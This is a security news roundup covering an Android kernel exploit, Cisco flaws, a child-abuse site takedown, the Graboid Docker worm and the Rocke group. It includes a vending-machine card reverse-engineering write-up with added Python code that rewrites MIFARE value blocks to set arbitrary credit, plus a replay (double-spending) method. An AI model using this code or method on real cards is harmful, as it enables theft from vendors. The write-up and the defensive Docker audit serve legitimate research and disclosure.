Maddie Stone published technical details and a proof-of-concept exploit for the high-severity vulnerability seven days after she reported it to the Android security team.

The flaw is a use-after-free vulnerability in the Android kernel’s binder driver; it could be exploited by a local privileged attacker or a malicious app to escalate privileges and gain root access to a vulnerable device. Experts warn it could potentially allow an attacker to fully compromise the device.

The flaw affects versions of the Android kernel released before April last year. The vulnerability was addressed in December 2017 in the 4.14 LTS kernel [1], the AOSP android 3.18 kernel [2], the AOSP android 4.4 kernel [3], and the AOSP android 4.9 kernel [4]. The expert pointed out that the Pixel 2 with the most recent security bulletin is still vulnerable based on source code review.

This means that most Android devices on the market that run an unpatched kernel are still vulnerable, even if their owners have installed the latest Android security updates.

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is reachable from inside the Chrome sandbox: the issue is exploitable from Chrome’s renderer processes under Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome rendering issue.

Last week, Google released security patches for Android; the tech giant announced that patches addressing CVE-2019-2215 on Pixel 1 and Pixel 2 devices will be included in the October update.

Now researcher Grant Hernandez, a PhD candidate at the Florida Institute of Cyber Security at the University of Florida, has publicly disclosed PoC exploit code for the CVE-2019-2215 vulnerability.

“All I needed to do was compile the exploit and run it over ADB. I downloaded the latest Android NDK and compiled the proof of concept. I ran it on my device and confirmed that I was able to reproduce Maddie Stone’s screenshot exactly.” reads a blog post published by Hernandez.

“The base PoC left us with a full kernel read/write primitive, essentially game over for the systems’ security, but left achieving root as an exercise for the reader.”

The expert explained that an attacker that aims to get a full root shell would need to bypass multiple layers of security defense implemented by Google, including Discretionary Access Control (DAC), Mandatory Access Control (MAC), Linux Capabilities (CAP), SECCOMP, Android Middleware.

Hernandez pointed out that an app-accessible kernel exploit allows the attacker to easily bypass or disable all of these layers of defense.

The expert detailed how to bypass DAC and CAP and how to disable SELinux and SECCOMP. The expert created a one-click rooting application called Qu1ckR00t.

“Once I had a reliable working exploit that I could use over ADB, I decided it would be neat to see the exploit working from an application context. I created Qu1ckR00t (the name is satire) as a one-click rooting application that also YOLO-installs™ Magisk.” concludes the researcher, who published the PoC exploit code on GitHub. “There is nothing novel about Qu1ckR00t, but it is cool to get a little taste of a typical iOS jailbreaking flow on Android. Maybe in the future if OEMs like Samsung completely remove OEM Unlock, this kind of rooting method will return to popularity.”

Critical and high-severity flaws addressed in Cisco Aironet APs

A critical flaw in Aironet access points (APs) can be exploited by a remote attacker to gain unauthorized access to vulnerable devices.

Cisco disclosed a critical vulnerability in Aironet access points (APs), tracked as CVE-2019-15260, that can be exploited by a remote, unauthenticated attacker to gain unauthorized access to vulnerable devices with elevated privileges. This vulnerability was discovered during the resolution of a Cisco TAC support case.

Cisco has already released software updates that address the flaw; the company pointed out that there are no workarounds that fix this vulnerability.

The flaw is caused by insufficient access control for some URLs; an attacker could exploit it by simply requesting the unprotected URLs.

“The vulnerability is due to insufficient access control for certain URLs on an affected device. An attacker could exploit this vulnerability by requesting specific URLs from an affected AP. An exploit could allow the attacker to gain access to the device with elevated privileges.” reads the security advisory published by Cisco.

The vulnerability affects Aironet 1540, 1560, 1800, 2800, 3800 and 4800 series APs. Cisco released versions 8.5.151.0, 8.8.125.0 and 8.9.111.0 to address the vulnerability.

Cisco revealed that there is no evidence of attacks exploiting the flaw in the wild.

Aironet APs are also affected by two high-severity flaws that can be exploited by an unauthenticated attacker to trigger a denial-of-service (DoS) condition.

The first flaw, tracked as CVE-2019-15261, impacts the Point-to-Point Tunneling Protocol (PPTP) VPN packet processing functionality.

“A vulnerability in the Point-to-Point Tunneling Protocol (PPTP) VPN packet processing functionality in Cisco Aironet Access Points (APs) could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition.” states the Cisco advisory. “The vulnerability is due to insufficient validation of Generic Routing Encapsulation (GRE) frames that pass through the data plane of an affected AP. An attacker could exploit this vulnerability by associating to a vulnerable AP, initiating a PPTP VPN connection to an arbitrary PPTP VPN server, and sending a malicious GRE frame through the data plane of the AP. A successful exploit could allow the attacker to cause an internal process of the targeted AP to crash, which in turn would cause the AP to reload. The AP reload would cause a DoS condition for clients that are associated with the AP.”

The second flaw, tracked as CVE-2019-15264, resides in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation.

“A vulnerability in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation of Cisco Aironet and Catalyst 9100 Access Points (APs) could allow an unauthenticated, adjacent attacker to cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition.” reads the security advisory published by Cisco.

“The vulnerability is due to improper resource management during CAPWAP message processing. An attacker could exploit this vulnerability by sending a high volume of legitimate wireless management frames within a short time to an affected device. A successful exploit could allow the attacker to cause a device to restart unexpectedly, resulting in a DoS condition for clients associated with the AP.”

International operation dismantled largest Dark Web Child abuse site

The United States Department of Justice announced the arrest of hundreds of criminals as part of a global operation against a dark web child abuse community.

The US Department of Justice announced the arrest of hundreds of criminals as part of a global operation conducted against the crime community operating the largest dark web child porn site, ‘Welcome to Video’.

The operation involved law enforcement agencies from several countries, including the IRS-CI, US Homeland Security Investigations, the UK’s NCA, the Korean National Police of the Republic of Korea, and the German Federal Criminal Police (the Bundeskriminalamt).

Officials have arrested the administrator of the site, Jong Woo Son of South Korea (23), along with 337 suspects in 38 countries who have been charged for allegedly being users of the site.

Two former federal law enforcement officials were allegedly involved in the child porn site, Paul Casey Whipple and Richard Nikolai Gratkowski.

The US authorities issued a warrant for Son’s arrest in February 2018; South Korean police arrested the man on March 5, 2018, and seized the server used to operate Welcome To Video.

According to the indictment, the ‘Welcome to Video’ child abuse site was launched in June 2015 and operated until March 2018. The site received at least 420 BTC in three years through at least 7300 transactions.

Experts from the National Center for Missing and Exploited Children (NCMEC) are currently analyzing over 250,000 unique videos hosted on the website, 45 percent of which contain new images not previously known to exist.

“According to the indictment, on March 5, 2018, agents from the IRS-CI, HSI, National Crime Agency in the United Kingdom, and Korean National Police in South Korea arrested Son and seized the server that he used to operate a Darknet market that exclusively advertised child sexual exploitation videos available for download by members of the site.” reads a press release published by the DoJ.  “The operation resulted in the seizure of approximately eight terabytes of child sexual exploitation videos, which is one of the largest seizures of its kind.”

The good news is that the operation led to the rescue of dozens of children living in the United States, Spain, and the United Kingdom.

According to the indictment, law enforcement discovered that the child abuse website was hosted on the IP addresses 121.185.153.64 and 121.185.153.45, which were registered by a provider in South Korea to an account serviced at the defendant’s home.

Experts also identified more than one million unique bitcoin addresses that were used to receive payments from the users of the website. Two users of the Darknet market committed suicide subsequent to the execution of search warrants.

“Welcome To Video offered these videos for sale using the cryptocurrency bitcoin.  Typically, sites of this kind give users a forum to trade in these depictions.  This Darknet website is among the first of its kind to monetize child exploitation videos using bitcoin.  In fact, the site itself boasted over one million downloads of child exploitation videos by users.  Each user received a unique bitcoin address when the user created an account on the website.” continues the press release. “An analysis of the server revealed that the website had more than one million bitcoin addresses, signifying that the website had capacity for at least one million users.”

Though Son is currently serving an 18-month sentence in South Korea, a federal grand jury in Washington DC unsealed a 9-count indictment against him just yesterday, with the U.S. authorities seeking his extradition to face justice.

“Darknet sites that profit from the sexual exploitation of children are among the most vile and reprehensible forms of criminal behavior,” said Assistant Attorney General Brian A. Benczkowski of the Justice Department’s Criminal Division. “This Administration will not allow child predators to use lawless online spaces as a shield. Today’s announcement demonstrates that the Department of Justice remains firmly committed to working closely with our partners in South Korea and around the world to rescue child victims and bring to justice the perpetrators of these abhorrent crimes.”

Graboid the first-ever Cryptojacking worm that targets Docker Hub

Security experts at Palo Alto Networks discovered a worm dubbed Graboid that spreads using Docker containers.

Palo Alto Networks researchers discovered a new Monero miner with wormable capabilities, dubbed Graboid, that spreads using Docker containers.

Experts discovered that, to target new systems, the Graboid worm periodically queries the C&C for vulnerable hosts; in this way the malicious code is told which target to infect next.

“Unit 42 researchers identified a new cryptojacking worm we’ve named Graboid that’s spread to more than 2,000 unsecured Docker hosts. We derived the name by paying homage to the 1990’s movie “Tremors,” since this worm behaves similarly to the sandworms in the movie, in that it moves in short bursts of speed, but overall is relatively inept.” reads the analysis published by the experts.

Graboid is the first-ever cryptojacking worm found in images on Docker Hub. The analysis conducted by the experts shows that, on average, each miner is active 63% of the time, with mining periods of 250 seconds.

Palo Alto Networks found over 2,000 Docker engines unsecured online, meaning that threat actors could take full control of them and abuse their resources for malicious purposes.

The hackers first compromise an unsecured Docker daemon, then run the malicious container from Docker Hub; the container fetches scripts and a list of vulnerable hosts from the C&C and spreads by targeting the hosts on that list.

‘Graboid’ implements both worm-spreading and cryptojacking capabilities inside containers. The experts noticed that the malware randomly selects three targets at each iteration. It installs the worm on the first target, stops the miner on the second target, and starts the miner on the third target, leading to a very random mining behavior.

“Essentially, the miner on every infected host is randomly controlled by all other infected hosts. The motivation for this randomized design is unclear. It can be a bad design, an evasion technique (not very effective), a self-sustaining system or some other purposes.” continues the analysis.

Experts reported that the malicious Docker image (pocosow/centos) has been downloaded more than 10,000 times from Docker Hub, while the gakeaws/nginx image has been downloaded over 6,500 times.

“While this cryptojacking worm doesn’t involve sophisticated tactics, techniques, or procedures, the worm can periodically pull new scripts from the C2s, so it can easily repurpose itself to ransomware or any malware to fully compromise the hosts down the line and shouldn’t be ignored.” concludes the analysis. “If a more potent worm is ever created to take a similar infiltration approach, it could cause much greater damage, so it’s imperative for organizations to safeguard their Docker hosts.”
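
The "unsecured Docker hosts" the worm spread to are daemons whose API listens on a TCP port without client authentication. As an added example, not code from the original article or from Palo Alto Networks, the following Python script audits how a daemon is told to listen, reading the "hosts" and TLS keys of daemon.json and the -H/--host and --tlsverify flags of a dockerd command line, and rates each TCP listener. It contrasts a weak configuration with a hardened one; all daemon.json contents, command lines and certificate paths are constructed placeholders.

```python
import json
import shlex
from urllib.parse import urlsplit

# Added example, not code from the original article or from Palo Alto Networks.
# Flags a Docker daemon whose remote API is reachable without client-certificate
# authentication, the exposure that let Graboid pull its container onto hosts.
# daemon.json keys and dockerd flags used here are the documented ones; the
# sample contents and paths are constructed.

# Weak: the API is bound on every interface on 2375 with no TLS at all.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Hardened: 2376 with tlsverify, so a client must present a cert signed by the CA.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",        # placeholder paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def parse_execstart(cmdline: str) -> dict:
    """Pull host and TLS settings out of a dockerd command line (e.g. a systemd ExecStart)."""
    args = shlex.split(cmdline)
    cfg = {"hosts": [], "tlsverify": False}
    i = 1  # args[0] is the dockerd binary itself
    while i < len(args):
        a = args[i]
        if a in ("-H", "--host") and i + 1 < len(args):
            cfg["hosts"].append(args[i + 1])
            i += 2
            continue
        if a.startswith("--host="):
            cfg["hosts"].append(a.split("=", 1)[1])
        elif a in ("--tlsverify", "--tlsverify=true"):
            cfg["tlsverify"] = True
        i += 1
    return cfg


def audit_docker_exposure(daemon_json: str, execstart: str) -> list:
    """Return one finding per listener with a risk rating."""
    file_cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    cli_cfg = parse_execstart(execstart)
    hosts = list(file_cfg.get("hosts", [])) + cli_cfg["hosts"]
    # --tls alone only encrypts the channel; only tlsverify authenticates the client.
    tlsverify = bool(file_cfg.get("tlsverify", False)) or cli_cfg["tlsverify"]
    findings = []
    for h in hosts:
        u = urlsplit(h)
        if u.scheme != "tcp":
            continue  # unix:// and fd:// sockets are local and governed by file permissions
        bind = u.hostname or "0.0.0.0"
        if tlsverify:
            risk = "ok"
        elif bind in ("127.0.0.1", "localhost", "::1"):
            risk = "low"   # still unauthenticated, but not reachable from the network
        else:
            risk = "high"  # unauthenticated, root-equivalent API on a network interface
        findings.append({"host": h, "tlsverify": tlsverify, "risk": risk})
    return findings


def worst_risk(findings: list) -> str:
    """Collapse a findings list to its highest rating ("ok" when nothing listens on TCP)."""
    order = {"ok": 0, "low": 1, "high": 2}
    return max((f["risk"] for f in findings), key=order.get, default="ok")


if __name__ == "__main__":
    print(audit_docker_exposure(WEAK_DAEMON_JSON, "dockerd"))
    print(audit_docker_exposure(HARDENED_DAEMON_JSON, "dockerd"))
    print(audit_docker_exposure("", "/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"))
```

On a real host, feed it the contents of /etc/docker/daemon.json and the ExecStart line of the docker unit (systemctl cat docker). A "high" finding is exactly the kind of host the worm's target list was built from.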

M6 Group, largest France private multimedia group, hit by ransomware attack

M6, one of France’s biggest TV channels, hit by ransomware

Unlike The Weather Channel earlier this year, M6 remained on the air.

The M6 Group, the largest France private multimedia group, was the victim of ransomware over the weekend.

The systems of the M6 Group, France’s largest private multimedia group, were infected with ransomware over the weekend; fortunately, none of the company’s TV and radio channels interrupted their broadcasts.

According to the French newspaper L’Express, the ransomware attack only impacted landlines and e-mail.

“The company’s phone lines and e-mail are unusable, so employees have to use their mobile phones and text messages to communicate,” an internal source told the newspaper. “all the office and management tools are in disruption.” 

The company revealed the incident took place on Saturday.

The cybersecurity staff at the M6 Group were able to mitigate the threat immediately, preventing any downtime for its TV channels, radio stations, and film studios.

“The M6 Group was the target of a malicious computer attack on Saturday morning, and the quick and efficient intervention of our cyber security experts has helped to ensure the continued security of the Internet. good broadcasting of the programs on all our TV and radio antennas.” reads the message posted through the Twitter account of the group.

In April, another broadcaster suffered a similar incident: a cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

In April 2015, TV5Monde was hit by a severe cyber attack that compromised its broadcasts across its channels. The attackers also hijacked the TV5Monde website and the social media accounts of the French broadcaster.

Yves Bigot, at the time the director-general of TV5Monde, told the BBC that the cyber attack came close to destroying the network of the French TV, and the investigation pointed to the Russia-linked APT28 group.

Signature update for Symantec Endpoint Protection crashed many devices

Symantec rolled out an intrusion prevention signature update for its Endpoint Protection product that has caused many devices to crash and display a so-called blue screen of death (BSOD).

An intrusion prevention signature update for the Endpoint Protection product had a serious impact on customer devices: in many cases it caused them to crash and display the blue screen of death (BSOD).

Several users reported problems through the company’s support forums and other sites online.

Customers complained about problems with Windows 7, 8 and 10.

Symantec has acknowledged the problem with the update to its Endpoint Protection Client explaining that it causes a Windows kernel exception.

The company released the version 2019/10/14 r62 to address the issue caused by the 2019/10/14 r61 update.

“After running LiveUpdate on Symantec Endpoint Protection (SEP), the computer crashes indicating IDSvix86.sys/IDSvia64.sys as the cause of the exception.” reads the advisory published by Symantec.

Symantec recommends downloading the new signature version for Endpoint Protection or rolling back to an earlier stable version.

“Please run LiveUpdate to download latest Intrusion Prevention signature 2019/10/14 r62, or rollback to an earlier known good content revision to prevent the BSOD situation. Please check How to Backdate Virus Definitions in Endpoint Protection Manager for more details on how to roll back definitions.” continues Symantec.

Customers who cannot run LiveUpdate to apply the signatures on their systems can use the following workaround:

  1. Boot in Safe Mode and perform the following for x64 or x86 installations of SEP,
  2. Run sc config idsvia64 start= disabled or sc config idsvix86 start= disabled from cmd (the sc syntax requires the space after start=),
  3. Reboot in normal mode,
  4. Update the IPSdefs,
  5. Run sc config idsvia64 start= system or sc config idsvix86 start= system from cmd,
  6. Reboot.

Approaching the Reverse Engineering of a RFID/NFC Vending Machine

Security expert Pasquale Fiorillo demonstrates how to hack an RFID/NFC vending machine.

The affected vendor did not answer my responsible disclosure request, so I’m here to disclose this “hack” without revealing the name of the vendor itself.

The target vending machine uses an insecure NFC card, the MIFARE Classic 1k, which has been affected by multiple vulnerabilities and so should not be used in important applications.
Furthermore, the user’s credit is stored on the card, enabling different attack scenarios, from double spending to potential data tampering that stores an arbitrary credit.

Useful notes from MIFARE Classic 1K datasheet:

EEPROM: 1 kB is organized in 16 sectors of 4 blocks. One block contains 16 bytes.
The last block of each sector is called “trailer”, which contains two secret keys and programmable access conditions for each block in this sector.

  • Manufacturer block: This is the first data block (block 0) of the first sector (sector 0). It contains the IC manufacturer data. This block is read-only.
  • Data blocks: All sectors contain 3 blocks of 16 bytes for storing data (Sector 0 contains only two data blocks and the read-only manufacturer block).
    The data blocks can be configured by the access conditions bits as:
    • Read/Write blocks: fully arbitrary data, in arbitrary format
    • Value blocks: fixed data format which permits native error detection and correction and a backup management.
      A value block can only be generated through a write operation in value block format:
      • Value: Signifies a signed 4-byte value. The least significant byte of the value is stored at the lowest address byte. Negative values are stored in standard 2’s complement format. For reasons of data integrity and security, the value is stored three times, twice non-inverted and once inverted.
      • Adr: Signifies a 1-byte address, which can be used to save the storage address of a block when implementing a powerful backup management. The address byte is stored four times, twice inverted and twice non-inverted.

(Figure: value block example for value 0x0012D687)

Let’s start hacking:

In this post I do not show you how to crack the MIFARE Classic keys needed to read/write the card, ’cause someone else has already disclosed it some time ago, so Google is your friend.
Lastly, please use this post to skill yourself up in the fascinating world of reverse engineering, and not for stealing stuff.

In order to start the analysis I need some dumps to compare.
The requirements for this task are the nfc-mfclassic tool included in libnfc, an NFC hardware interface like the ACR122U, and a binary compare (aka binary diff) tool like dhex.

Dumps:

  • Dump 0: Virgin card (not included in the screenshot below ’cause all data bytes were 0x00, except for sector 0, which holds the UID and manufacturer information. That sector is read-only, so those bytes are the same across dumps)
  • Dump 1: Card charged with single 0.10€ coin (Note that vending machine displays the balance with 3 decimals, 0.100€)
  • Dump 2: 0.00€ after spending the entire balance with 4 transactions of 0.025€ each
  • Dump 3: 0.10€ recharged with one single coin

(Screenshot: Dump 1 compared to Dump 2, yellow bytes differ)
(Screenshot: Dump 2 compared to Dump 3, yellow bytes differ)

Blurred bytes are the MIFARE keys A and B, except for the 32 bytes at 0xE0 offset of which I don’t know their purpose.
The 4 bytes between the keys are the Access Conditions and denote which key must be used for read and write operations (key A or key B) and the block type (“read/write block” or “value block”).

The tool mfdread is useful to decode the Access Condition bytes rapidly, and, in general, to display MIFARE Classic data divided by sectors and blocks:

(Screenshot: Dump 1 with mfdread parser)
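
What a tool like mfdread does with those bytes can be reproduced in a few lines. The following Python snippet is an added example, not code from the original post or from mfdread: it decodes the three access-condition bytes of a sector trailer into the C1C2C3 bits of each block, checks that the inverted copies agree (a card with inconsistent bits locks the sector for good, so a mismatch in a dump means corruption or tampering), and maps a data block's bits to the operations the datasheet permits, including whether the block can be used as a value block. The two trailers are constructed: the factory default, and one that makes blocks 0 and 1 of the sector value blocks writable only with key B.

```python
# Added example, not code from the original post or from mfdread. Decodes the
# access-condition bytes of a MIFARE Classic 1K sector trailer following the
# layout in the MIFARE Classic datasheet. The trailers below are constructed.

# Data-block rules from the datasheet, keyed by (C1 << 2 | C2 << 1 | C3):
# (read, write, increment, decrement/transfer/restore).
DATA_BLOCK_RULES = {
    0b000: ("A|B", "A|B", "A|B", "A|B"),      # transport configuration
    0b010: ("A|B", "never", "never", "never"),
    0b100: ("A|B", "B", "never", "never"),
    0b110: ("A|B", "B", "B", "A|B"),          # the usual value-block setup
    0b001: ("A|B", "never", "never", "A|B"),  # value block, decrement only
    0b011: ("B", "B", "never", "never"),
    0b101: ("B", "never", "never", "never"),
    0b111: ("never", "never", "never", "never"),
}
# Configurations under which increment/decrement (value-block operations) are possible.
VALUE_BLOCK_CONFIGS = {0b000, 0b110, 0b001}

# Constructed trailers: key A, 3 access bytes, general-purpose byte, key B.
DEFAULT_TRAILER = bytes.fromhex("FFFFFFFFFFFF" "FF0780" "69" "FFFFFFFFFFFF")
VALUE_TRAILER = bytes.fromhex("A0A1A2A3A4A5" "4C378B" "69" "B0B1B2B3B4B5")


def decode_access_bits(trailer: bytes) -> dict:
    """Return {block: (C1, C2, C3)} for blocks 0..3 of the sector."""
    if len(trailer) != 16:
        raise ValueError("a sector trailer is 16 bytes")
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    # Datasheet layout (high nibble | low nibble; bit i of a nibble is block i):
    #   byte 6 = ~C2 | ~C1,   byte 7 = C1 | ~C3,   byte 8 = C3 | C2
    c1 = (b7 >> 4) & 0xF
    c2 = b8 & 0xF
    c3 = (b8 >> 4) & 0xF
    # The inverted copies must agree with the plain ones.
    if (b6 & 0xF) != (~c1 & 0xF) or (b6 >> 4) != (~c2 & 0xF) or (b7 & 0xF) != (~c3 & 0xF):
        raise ValueError("inconsistent access bits")
    return {blk: ((c1 >> blk) & 1, (c2 >> blk) & 1, (c3 >> blk) & 1) for blk in range(4)}


def trailer_is_consistent(trailer: bytes) -> bool:
    """True when the access bits decode cleanly, False on a corrupted trailer."""
    try:
        decode_access_bits(trailer)
        return True
    except ValueError:
        return False


def describe_data_block(bits: tuple) -> dict:
    """Permissions for a data block (block 0..2 of a sector) from its (C1, C2, C3)."""
    c1, c2, c3 = bits
    cfg = (c1 << 2) | (c2 << 1) | c3
    read, write, inc, dec = DATA_BLOCK_RULES[cfg]
    return {
        "c1c2c3": f"{c1}{c2}{c3}",
        "read": read, "write": write, "increment": inc, "decrement": dec,
        "value_block_possible": cfg in VALUE_BLOCK_CONFIGS,
    }


if __name__ == "__main__":
    for name, t in (("default", DEFAULT_TRAILER), ("value", VALUE_TRAILER)):
        bits = decode_access_bits(t)
        print(name, {blk: describe_data_block(bits[blk]) for blk in range(3)}, "trailer:", bits[3])
```

To use it on a real dump, slice the 16 bytes at offset sector*64 + 48 and pass them to decode_access_bits; the trailer block's own bits (block 3) select which key may read or rewrite the keys and access bytes and follow a separate table in the datasheet.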

Early analysis:

Note: from now on I will refer to the offsets with a [square parenthesis] and a value with no parenthesis.

  • Blocks 8, 9, 10, 12 and 13 can be used also as “value block”
  • Except for bytes between offsets [0x80] and [0x9F], only a few bytes differ between dumps
  • Some data are redundant, for example [0x60 … 0x63] has the same values of [0xA0 … 0xA3]
  • Values at [0xC0], [0xD0], [0xC8], [0xD8] differ by 4 between 1st and 2nd dump (eg: 0xFE – 0xFA = 0x4) and differ by 1 between 2nd dump and 3rd dump (eg: 0xFA – 0xF9 = 0x1)
  • Values at [0xC4], [0xD4] differ by 4 between 1st and 2nd dump (eg: 0x05 – 0x01 = 0x4) and differ by 1 between 2nd and 3rd dump (eg: 0x06 – 0x05 = 0x1)
    • 4 is the number of spend transactions made the first time, and 1 is the number of recharge transactions made the second time
  • The byte at a yellow-boxed offset and the byte at the corresponding red-boxed offset sum to 0xFF. In other words, the red-boxed byte is the inverse (XOR with 0xFF) of the yellow-boxed one. For example:
    • 0xFE ⊕ 0xFF = 0x01
    • 0xFF ⊕ 0xFF = 0x00
    • 0x7F ⊕ 0xFF = 0x80
  • Values at [0x60 … 0x63] are a UNIX TIMESTAMP in little endian notation:
    • Dump 1: 0x4F9E2C27 -> 0x272C9E4F = 657235535 = 10/29/1990 @ 9:25pm
    • Dump 2: 0x71B62C27 -> 0x272CB671 = 657241713 = 10/29/1990 @ 11:08pm
    • Dump 3: 0x18592D27 -> 0x272D5918 = 657283352 = 10/30/1990 @ 10:42am
      • Ok, we are not in the ’90s, but the time difference between transactions is correct; maybe the vending machine doesn’t have a UPS 🙂

Early findings:

  • The timestamp of the last transaction is stored as a 32-bit integer at MIFARE block 6 and redundantly at MIFARE block 10
  • Only MIFARE blocks 12 and 13 have the “Value block” format, and they are used to store the counter of remaining transactions in 32-bit format.
    This counter starts from 0x7FFFFFFF (2,147,483,647) and is decreased at each transaction
  • Blocks 1, 4, and 14 contain some data that are fixed between dumps
  • Blocks 8 and 9 change entirely at each transaction

The credit:

If credit is stored on the card, it is encoded in blocks 8 and 9, and the number of bytes that change between dumps with only a small credit difference (for example between 0.00€ and 0.10€) suggests that some cryptographic function is involved.

At this point, a double-spending attack could confirm whether the credit is really stored on the card.
So, after spending all the credit, I wrote a previous dump back onto the card and tested it at the vending machine. The card was fully functional, with the credit stored in that dump. Now I am certain that the credit is encoded (and probably encrypted) in blocks 8 and 9.

Conclusion:

Even though the encoding format of the credit is still unknown, a double-spending attack was possible.

This means that the vendor’s effort to obfuscate the credit is nullified 🙁

Adding a unique token to the card that is invalidated in the back-end after each transaction would require that token to be shared among all the vendor’s vending machines; but if we add an Internet connection to the vending machine, there is no longer any reason to store the credit on the card.

So, after all, the only remediation that makes sense is: DO NOT STORE THE CREDIT ON THE CARD! And, more generally: DO NOT TRUST THE CLIENT!

Road to arbitrary credit:

Spending 1€ an infinite number of times isn’t the goal of this hack. The only real goal is FUN!
To continue this analysis I need to collect a large number of dumps in order to form some hypotheses, so when I have more material I will write another post.

An example of easier card:

Some vendors take an easier approach, using the MIFARE “value block” to store the credit without obfuscation or encryption.

Credit stored on the MIFARE Value Block

The screenshot above, made with “MIFARE Classic Tool” on an Android smartphone, shows a value block used to store the credit:

0x00000CE4 = 3300 is the value in thousandths of a euro (3.30€).

This particular vendor does not use key A, and key B is the default key 0xFFFFFFFFFFFF (MIFARE Classic keys are 48 bits), so the attacker doesn’t need to crack anything.
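The value-block format is the same whether the vendor stores a transaction counter in it (blocks 12 and 13 of the first card) or the credit itself (this card). The following is an added example, not code from the original post or from MIFARE Classic Tool: a parser that checks the redundant copies before accepting the value, a decoder for the credit in thousandths of a euro, and a writer that rebuilds the block with a new credit, which is all an attacker needs once the keys are default. The sample blocks are constructed; only the value 0x00000CE4 comes from the screenshot, while the block address 8 and the counter value are assumed.

```python
import struct


def make_value_block(value, addr):
    """Build a MIFARE Classic value block: value, ~value, value, addr, ~addr, addr, ~addr."""
    v = struct.pack("<i", value)
    return v + bytes(b ^ 0xFF for b in v) + v + bytes([addr, addr ^ 0xFF, addr, addr ^ 0xFF])


def parse_value_block(block):
    """Parse a 16-byte value block and return (value, addr).

    Raises ValueError when the redundant copies do not agree, which is the
    same consistency check a reader performs before accepting the block.
    """
    if len(block) != 16:
        raise ValueError("a MIFARE Classic block is 16 bytes")
    v0, v1, v2 = block[0:4], block[4:8], block[8:12]
    if v1 != bytes(b ^ 0xFF for b in v0) or v2 != v0:
        raise ValueError("value copies do not match")
    a0, a1, a2, a3 = block[12:16]
    if not (a0 == a2 and a1 == a3 and a0 ^ a1 == 0xFF):
        raise ValueError("address bytes do not match")
    return struct.unpack("<i", v0)[0], a0


def credit_euro(block):
    """Plain-credit vendor: the stored value is in thousandths of a euro."""
    value, _ = parse_value_block(block)
    return value / 1000


def transactions_used(block, start=0x7FFFFFFF):
    """Counter vendor: the value starts at 0x7FFFFFFF and is decremented per transaction."""
    value, _ = parse_value_block(block)
    return start - value


def set_credit_euro(block, euros):
    """Rebuild the block with a new credit, keeping its address byte.

    This is what an attacker does with a value-block editor once Key B is known.
    """
    _, addr = parse_value_block(block)
    return make_value_block(round(euros * 1000), addr)


# CONSTRUCTED samples: 0x00000CE4 (3.30 EUR) is the value from the screenshot above;
# the block address 8 and the counter value are assumed.
CREDIT_BLOCK = make_value_block(0x00000CE4, 8)
COUNTER_BLOCK = make_value_block(0x7FFFFFFF - 5, 12)

if __name__ == "__main__":
    print("credit:", credit_euro(CREDIT_BLOCK), "EUR")
    print("transactions used:", transactions_used(COUNTER_BLOCK))
    print("hex of 50.00 EUR block:", set_credit_euro(CREDIT_BLOCK, 50.00).hex())
    corrupted = bytearray(CREDIT_BLOCK)
    corrupted[0] ^= 0x01          # flip one bit of the value: the inverse copy no longer matches
    try:
        parse_value_block(bytes(corrupted))
    except ValueError as exc:
        print("corrupted block rejected:", exc)
```

Note what the redundancy buys and what it does not: it detects a torn write or a single corrupted byte, but as long as the four copies agree (and Key B is known) any value is accepted, which is exactly why the only real fix is to keep the balance off the card.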

Reverse engineering and cracking a vending machine is always fun.

The original post was published here

About the author: Pasquale Fiorillo

I’m a Security Auditor at ISGroup and an independent Security Researcher. As a Security Auditor, my job is to perform security activities such as Penetration Tests and Vulnerability Assessments on networks and web applications in order to identify security issues that may be exploited by an attacker to perform malicious actions on your assets.

When I was a teenager I co-founded an underground e-zine called Italian Hard Phreaking with some friends from IRC, writing lots of papers about hacking and reverse engineering in the telecommunications world. Later, I started a new adventure as a Security Researcher, discovering vulnerabilities in commonly used software, web applications and web sites, in collaboration with the other fabulous people of U.S.H.

Pierluigi Paganini

(SecurityAffairs – RFID/NFC, vending machine)

The post Approaching the Reverse Engineering of a RFID/NFC Vending Machine appeared first on Security Affairs.

Chinese-speaking cybercrime gang Rocke changes tactics

Chinese-speaking cybercrime gang Rocke, which carried out several large-scale cryptomining campaigns, is now using new tactics to evade detection.

Chinese-speaking cybercrime gang Rocke, which carried out several large-scale cryptomining campaigns in the past, has changed its tactics, techniques, and procedures (TTPs) and is using updated malware to evade detection.

The cybercrime organization was first spotted in April 2018 by researchers at Cisco Talos; in early 2019, researchers from Palo Alto Networks Unit 42 found new malware samples used by the Rocke group for cryptojacking that uninstall the cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud from compromised Linux servers.

In March, the group was using a dropper dubbed LSD that was controlled via Pastebin, but since this summer the threat actors have moved their Command and Control (C2) infrastructure to a self-hosted solution.

The malicious code is used by the hackers to deliver a Monero (XMR) cryptocurrency miner that is detected by almost no antivirus solution.

The Rocke group was also observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners.

